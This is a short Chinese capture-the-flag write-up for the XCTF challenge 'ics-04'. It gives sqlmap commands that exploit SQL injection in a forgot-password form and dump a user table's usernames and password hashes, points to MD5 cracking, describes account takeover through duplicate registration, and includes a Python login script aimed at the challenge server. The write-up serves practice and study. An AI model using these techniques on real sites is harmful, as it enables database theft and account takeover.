題目：

解題思路：
注入點在忘記密碼處，使用sqlmap一把梭

sqlmap -r 1.txt --dbs --batch sqlmap -r 1.txt --dbs --batch -D cetc004 -T user -C 'username,password' --dump

直接解密md5，解密網址：https://www.somd5.com/
然后使用c3tlwDmIn23登錄，即可獲得flag

注：如果md5無法解密還可使用如下方法
1、利用可以重復注冊的漏洞，測試方法，使用c3tlwDmIn23作為用戶名重新注冊，設置自己知道的密碼，然后登陸，即可獲得flag
2、網上還有一種，使用py腳本，但目前無法顯示flag了，只有正確的密碼才可以。經過抓包發現他不是前端md5加密，再和后端數據庫中加密后的密碼進行比對；有可能是后端md5加密，然后再進行比對
貼一下代碼：如果以后有類似題目，可以參考

import requestsurl = 'http://159.138.137.79:61667/login.php' username = 'c3tlwDmIn23' password = '2f8667f381ff50ced6a3edc259260ba9' data = {'username':username,'password':password} req = requests.post(url,data=data) req.encoding='utf-8' print (req.text)

總結

以上是生活随笔為你收集整理的XCTF-高手进阶区：ics-04的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。